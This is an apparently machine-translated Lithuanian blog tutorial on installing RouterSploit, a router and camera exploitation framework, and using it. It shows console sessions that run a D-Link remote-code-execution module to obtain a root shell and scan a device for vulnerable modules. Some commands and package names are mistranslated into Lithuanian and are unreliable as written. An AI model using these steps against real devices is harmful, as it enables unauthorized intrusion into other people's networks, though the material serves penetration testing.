Namai » Linux įrankiai » RouterSploit – Pilna eksploatavimo sistemos pamoka [2020]

RouterSploit – Pilna eksploatavimo sistemos pamoka [2020]

pateikė Suyash
routersploit

RouterSploit yra nuostabi išnaudojimo sistema, sukurta specialiai įterptiesiems įrenginiams.

Šį įrankį pentester gali naudoti kamerų ir maršrutizatorių saugumui nuskaityti.

„RouterSploit“ akcentai:

  • Užkoduota Python.
  • Komandinės eilutės sąsaja.
  • Docker palaikymas.
  • Moduliniai įrankiai.

Palaikoma OS:

  1. MacOS.
  2. Linux.
  3. Android telefonas.
  4. Windows.

„RouterSploit“ diegimas:

Reikalavimai:

  • ateities
  • prašymus
  • Paramic
  • sustoti
  • pycrypto

Neprivaloma:

  • melsvas – Bluetooth mažai energijos

Diegimas Kali Linux:

Vykdykite toliau pateiktas komandas:

apt-get install python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install -r requirements.txt
python3 rsf.py

Bluetooth Low Energy palaikymas:

apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py

Diegimas Ubuntu:

Vykdykite toliau pateiktas komandas:

sudo add-apt-repository universe
sudo apt-get install git python3-pip
git clone https://www.github.com/threat9/routersploit
cd routersploit
python3 -m pip install setuptools
python3 -m pip install -r requirements.txt
python3 rsf.py

Bluetooth Low Energy palaikymas:

apt-get install libglib2.0-dev
python3 -m pip install bluepy
python3 rsf.py

Diegimas MacOS:

Vykdykite toliau pateiktas komandas:

git clone https://www.github.com/threat9/routersploit
cd routersploit
sudo python3 -m pip install -r requirements.txt
python3 rsf.py

Diegimas „Docker“.:

Vykdykite toliau pateiktas komandas:

git clone https://www.github.com/threat9/routersploit
cd routersploit
docker build -t routersploit .
docker run -it --rm routersploit

Kaip atnaujinti RouterSploit?

Turite dažnai atnaujinti RouterSploit, kad išvengtumėte nepatogumų.

Nauji moduliai pristatomi beveik kiekvieną dieną.

cd routersploit
git pull

Kaip naudoti RouterSploit?

Naudojimas

root@kalidev:~/git/routersploit# ./rsf.py
 ______ _ _ _ _ _
 | ___ \          | |          /  ___|     | |     (_) |
 | |_/ /___ _ _| |_ ___ _ __ `--. _ __ | | ___ _| |_
 |    // _ \| | | | __/ _ \ '__|`--. \ '_ \| |/ _ \| | __|
 | |\ \ (_) | |_| | ||  __/ |  /\__/ / |_) | | (_) | | |_
 _| \____/ __,_|\_____|_|  \____/| .__/|_|\___/|_|\__|
                                     | |
       Eksploatavimo sistema, skirta    |_|   pagal Threat9
            Įterptieji įrenginiai
  
 Kodinis pavadinimas   : Aš žinojau, kad tau sunku
 Versija    : 3.3.0
 Pagrindinis puslapis   : https://www.threat9.com/ - @threatnine
 Prisijunkite prie Slack : routersploit.slack.com

 Prisijunkite prie Threat9 beta programos - https://www.threat9.com/

 Išnaudojimai: 128 Skaitytuvai: 4 Kreditai: 165 Bendras: 4 Naudingi kroviniai: 32 Kodavimo įrenginiai: 6

rsf >

Išnaudojimai:

Parengti išnaudojimą, tiesiog pasirinkite modulį ir nustatykite tikslą:

rsf > naudoti išnaudojimus/
exploits/2wire/ exploits/asmax/ exploits/asus/ exploits/cisco/ exploits/dlink/ exploits/fortinet/ exploits/juniper/ exploits/linksys/ exploits/multi/ exploits/netgear/
rsf > naudokite exploits/dlink/dir_300_600_rce
rsf (D-LINK DIR-300 & DIR-600 RCE) >

Norėdami užbaigti, naudokite tabuliavimo klavišą.

Norėdami parodyti parinktis, tiposhow:

rsf (D-LINK DIR-300 & DIR-600 RCE) > rodyti parinktis

Tikslinės parinktys:


   Pavadinimas Dabartiniai nustatymai Aprašymas                                
   ----       ----------------     -----------                                
   tikslinis Tikslinis adresas pvz. http://192.168.1.1     
   uostas       80                   Tikslinis uostas

Naudokiterun arbaexploit komanda išnaudoti taikinį:

rsf (D-LINK DIR-300 & DIR-600 RCE) > paleisti
[+] Tikslas yra pažeidžiamas
[*] Iškviečiamas komandų ciklas...
cmd > whoami
šaknis

Norėdami nustatyti parinktis:

rsf (D-LINK DIR-300 & DIR-600 RCE) > nustatyti tikslą http://192.168.1.1 [+] {'target': 'http://192.168.1.1'}

Galima patikrinti, ar taikinys yra pažeidžiamas konkretaus išnaudojimo:

rsf (D-LINK DIR-300 & DIR-600 RCE) > patikrinti
[+] Tikslas yra pažeidžiamas

Bėkshow info kad būtų rodoma informacija apie išnaudojimą.

Pažeidžiamų taikinių nuskaitymas:

Skaitytuvai leidžia greitai patikrinti, ar taikinys yra pažeidžiamas dėl kokių nors išnaudojimų.

Naudokite tas pačias komandas, kad parodytumėte / nustatytumėte parinktis, ir taip pat bėgti.

rsf (D-Link skaitytuvas) > paleisti
[+] exploits/dlink/dwr_932_info_disclosure yra pažeidžiamas
[-] exploits/dlink/dir_300_320_615_auth_bypass nėra pažeidžiamas
[-] exploits/dlink/dsl_2750b_info_disclosure nėra pažeidžiamas
[-] exploits/dlink/dns_320l_327l_rce nėra pažeidžiamas
[-] exploits/dlink/dir_645_password_disclosure nėra pažeidžiamas
[-] exploits/dlink/dir_300_600_615_info_disclosure nėra pažeidžiamas
[-] exploits/dlink/dir_300_600_rce nėra pažeidžiamas

[+] Įrenginys yra pažeidžiamas!
- exploits/dlink/dwr_932_info_disclosure

Oficialus RouterSploit

Taip pat skaitykite: 1337x proxy

Baigiamieji žodžiai:

RouterSploit yra nuostabi priemonė naudoti.

Jei susiduriate su problemomis, susijusiomis su RouterSploit. Būtinai pakomentuokite žemiau. Mūsų komanda CSHAWK kuo greičiau su jumis susisieks.

Palikite komentarą